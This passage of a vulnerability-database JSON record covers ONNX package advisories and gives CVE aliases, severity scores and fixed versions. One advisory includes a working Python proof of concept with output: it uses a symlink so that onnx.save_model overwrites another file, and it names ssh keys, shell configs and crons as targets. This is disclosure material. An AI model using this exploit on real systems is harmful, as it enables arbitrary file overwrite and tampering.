(https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) alloing absolute paths like `C:\\` (only 1 part):\n```python\nif location_path.is_absolute() and len(location_path.parts) > 1\n```\nThis may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).\n\n### PoC\n\nInstall the dependencies and run this:\n```python\nmport os\nimport sys\nimport tempfile\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.numpy_helper import from_array\n\n# Create a temporary directory for our poc\nwith tempfile.TemporaryDirectory() as tmpdir:\n    print(f\"[*] Working directory: {tmpdir}\")\n\n    # Create a \"sensitive\" file that we'll overwrite\n    sensitive_file = os.path.join(tmpdir, \"sensitive.txt\")\n    with open(sensitive_file, 'w') as f:\n        f.write(\"SENSITIVE DATA - DO NOT OVERWRITE\")\n\n    original_content = open(sensitive_file, 'rb').read()\n    print(f\"[*] Created sensitive file: {sensitive_file}\")\n    print(f\"    Original content: {original_content}\")\n\n    # Create a simple ONNX model with a large tensor\n    print(\"[*] Creating ONNX model with external data...\")\n\n    # Create a tensor with data > 1KB (to trigger external data)\n    large_array = np.ones((100, 100), dtype=np.float32)  # 40KB tensor\n    large_tensor = from_array(large_array, name='large_weight')\n\n    # Create a minimal model\n    model = helper.make_model(\n        helper.make_graph(\n            [helper.make_node('Identity', ['input'], ['output'])],\n            'minimal_model',\n            [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],\n            [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],\n            [large_tensor]\n        )\n    )\n\n    # Save model with external data to create the external data file\n    model_path = os.path.join(tmpdir, \"model.onnx\")\n    external_data_name = \"data.bin\"\n    external_data_path = os.path.join(tmpdir, external_data_name)\n\n    onnx.save_model(\n        model, \n        model_path,\n        save_as_external_data=True,\n        all_tensors_to_one_file=True,\n        location=external_data_name,\n        size_threshold=1024\n    )\n\n    print(f\"[+] Model saved: {model_path}\")\n    print(f\"[+] External data created: {external_data_path}\")\n\n    # Now comes the attack: replace the external data file with a symlink\n    print(\"[!] ATTACK: Replacing external data file with symlink...\")\n\n    # Remove the legitimate external data file\n    if os.path.exists(external_data_path):\n        os.remove(external_data_path)\n        print(f\"    Removed: {external_data_path}\")\n\n    # Create symlink pointing to sensitive file\n    os.symlink(sensitive_file, external_data_path)\n    print(f\"    Created symlink: {external_data_path} -> {sensitive_file}\")\n\n    # Now load and re-save the model, which will trigger the vulnerability\n    print(\"Loading model and saving with external data...\")\n    try:\n        # Load the model (without loading external data)\n        loaded_model = onnx.load(model_path, load_external_data=False)\n\n        # Modify the model slightly (to ensure we write new data)\n        loaded_model.graph.initializer[0].raw_data = large_array.tobytes()\n\n        # Save again - this will call save_external_data() and follow the symlink\n        onnx.save_model(\n            loaded_model,\n            model_path,\n            save_as_external_data=True,\n            all_tensors_to_one_file=True,\n            location=external_data_name,\n            size_threshold=1024\n        )\n    except Exception as e:\n        print(f\"[-] Error: {e}\")\n    \n    # Check if the sensitive file was overwritten\n    print(\"[*] Checking if sensitive file was modified...\")\n    modified_content = open(sensitive_file, 'rb').read()\n    \n    print(f\"    Original size: {len(original_content)} bytes\")\n    print(f\"    Current size:  {len(modified_content)} bytes\")\n    print(f\"    Original content: {original_content[:50]}\")\n    print(f\"    Current content:  {modified_content[:50]}...\")\n    print()\n    \n    if modified_content != original_content:\n        print(\"[!] Success!\")\n    else:\n        print(\"[-] Failure\")\n```\nOutput:\n```\n[*] Working directory: /tmp/tmpqy7z88_l\n[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt\n    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n\n[*] Creating ONNX model with external data...\n[+] Model saved: /tmp/tmpqy7z88_l/model.onnx\n[+] External data created: /tmp/tmpqy7z88_l/data.bin\n[!] ATTACK: Replacing external data file with symlink...\n    Removed: /tmp/tmpqy7z88_l/data.bin\n    Created symlink: /tmp/tmpqy7z88_l/data.bin -> /tmp/tmpqy7z88_l/sensitive.txt\nLoading model and saving with external data...\n[*] Checking if sensitive file was modified...\n    Original size: 33 bytes\n    Current size:  40033 bytes\n    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n    Current content:  b'SENSITIVE DATA - DO NOT OVERWRITE\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00'...\n```\nSuccessfully overwritting the \"sensitive data\" file.\n\n### Impact\nThe impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.\n\n### Mitigations\n1. Atomic file creation\n2. Symlink protection\n3. Path canonicalization","references":[{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6"},{"reference_url":"https://github.com/advisories/GHSA-q56x-g2fj-4rj6","reference_id":"GHSA-q56x-g2fj-4rj6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q56x-g2fj-4rj6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["GHSA-q56x-g2fj-4rj6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rs2r-qmck-4qgh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37096?format=json","vulnerability_id":"VCID-seht-766r-kke7","summary":"Path Traversal vulnerability in onnx.external_data_helper.save_external_data in ONNX 1.17.0 allows attackers to overwrite arbitrary files by supplying crafted external_data.location paths containing traversal sequences, bypassing intended directory restrictions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5187","reference_id":"","reference_type":"","scores":[{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85946","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85933","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85948","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85945","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5187"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-51480","reference_id":"","reference_type":"","scores":[{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58958","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.5895","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58949","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58934","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58952","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-51480"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/advisories/GHSA-6rq9-53c3-f7vj","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/advisories/GHSA-6rq9-53c3-f7vj"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f"},{"reference_url":"https://github.com/onnx/onnx/commit/3fc3845edb048df559aa2a839e39e95503a0ee34","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/commit/3fc3845edb048df559aa2a839e39e95503a0ee34"},{"reference_url":"https://github.com/onnx/onnx/issues/6215","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/issues/6215"},{"reference_url":"https://github.com/onnx/onnx/pull/6145","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/pull/6145"},{"reference_url":"https://github.com/onnx/onnx/pull/6222","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/pull/6222"},{"reference_url":"https://github.com/onnx/onnx/pull/6959","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/onnx/onnx/pull/6959"},{"reference_url":"https://github.com/onnx/onnx/pull/7040","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/onnx/onnx/pull/7040"},{"reference_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/releases/tag/v1.16.2"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-148.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-148.yaml"},{"reference_url":"https://huntr.com/bounties/50235ebd-3410-4ada-b064-1a648e11237e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-07T18:47:07Z/"}],"url":"https://huntr.com/bounties/50235ebd-3410-4ada-b064-1a648e11237e"},{"reference_url":"https://www.gecko.security/blog/cve-2025-51480","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://www.gecko.security/blog/cve-2025-51480"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1075852","reference_id":"1075852","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1075852"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5187","reference_id":"CVE-2024-5187","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5187"},{"reference_url":"https://usn.ubuntu.com/8307-1/","reference_id":"USN-8307-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/8307-1/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44709?format=json","purl":"pkg:pypi/onnx@1.16.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.2"}],"aliases":["CVE-2024-5187","CVE-2025-51480","GHSA-6rq9-53c3-f7vj","PYSEC-2025-148"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-seht-766r-kke7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37245?format=json","vulnerability_id":"VCID-u796-p1fa-ubf5","summary":"Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28500","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01539","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01536","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01547","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01546","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28500"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28500","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28500"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-103.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-103.yaml"},{"reference_url":"https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/"}],"url":"https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28500","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28500"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209","reference_id":"1131209","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2448518","reference_id":"2448518","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2448518"},{"reference_url":"https://github.com/advisories/GHSA-hqmj-h5c6-369m","reference_id":"GHSA-hqmj-h5c6-369m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hqmj-h5c6-369m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/48828?format=json","purl":"pkg:pypi/onnx@1.21.0rc1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0rc1"},{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-28500","GHSA-hqmj-h5c6-369m","PYSEC-2026-103"],"risk_score":4.1,"exploitability":"0.5","weighted_severity":"8.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u796-p1fa-ubf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37001?format=json","vulnerability_id":"VCID-vufm-7t73-xfgt","summary":"A vulnerability in the `download_model` function of the onnx/onnx framework, before and including version 1.16.1, allows for arbitrary file overwrite due to inadequate prevention of path traversal attacks in malicious tar files. This vulnerability can be exploited by an attacker to overwrite files in the user's directory, potentially leading to remote command execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-7776","reference_id":"","reference_type":"","scores":[{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90172","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90183","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90168","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.9017","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90171","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-7776"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7776","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7776"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f"},{"reference_url":"https://github.com/onnx/onnx/pull/6222","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/pull/6222"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml"},{"reference_url":"https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-03-20T15:51:57Z/"}],"url":"https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-7776","reference_id":"CVE-2024-7776","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-7776"},{"reference_url":"https://github.com/advisories/GHSA-h36j-8vv3-cj52","reference_id":"GHSA-h36j-8vv3-cj52","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h36j-8vv3-cj52"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44709?format=json","purl":"pkg:pypi/onnx@1.16.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.2"},{"url":"http://public2.vulnerablecode.io/api/packages/48818?format=json","purl":"pkg:pypi/onnx@1.17.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.17.0"}],"aliases":["CVE-2024-7776","GHSA-h36j-8vv3-cj52","PYSEC-2025-10"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vufm-7t73-xfgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36361?format=json","vulnerability_id":"VCID-vv5a-aqzk-kker","summary":"Versions of the package onnx before 1.13.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory, for example 